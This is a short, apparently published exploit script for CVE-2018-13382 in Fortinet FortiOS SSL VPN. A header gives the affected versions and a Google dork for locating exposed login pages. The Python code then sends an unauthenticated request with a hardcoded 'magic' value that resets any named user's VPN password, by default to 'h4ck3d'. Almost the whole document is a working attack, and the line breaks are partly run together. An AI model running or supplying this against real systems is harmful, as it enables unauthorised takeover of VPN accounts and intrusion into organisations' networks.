# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification# Google Dork: intitle:"Please Login" "Use FTM Push"# Date: 15/11/2020# Exploit Author: Ricardo Longatto# Details: This exploit allow change users password from SSLVPN web portal# Vendor Homepage: https://www.fortinet.com/# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10.# Tested on: 6.0.4# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382# CVE : CVE-2018-13382# Credits: Vulnerability by Meh Chang and Orange Tsai.#!/usr/bin/env pythonimport requests, urllib3, sys, re, argparse
urllib3.disable_warnings()
menu = argparse.ArgumentParser(description ="[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
menu.add_argument('-t', metavar='Target/Host IP', required=True)
menu.add_argument('-p', metavar='Port', required=True)
menu.add_argument('-u', metavar='User', required=True)
menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d',help='set the password for user, if you not set, the default password will be set to h4ck3d')
op = menu.parse_args()
host = op.t
port = op.p
user = op.u
setpass = op.setpass
url ="https://"+host+":"+port+"/remote/logincheck"
exploit ={'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass}
r = requests.post(url, verify=False, data = exploit)if re.search("/remote/hostcheck_install",r.text):print"[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]"else:print"Exploit Failed. :/"
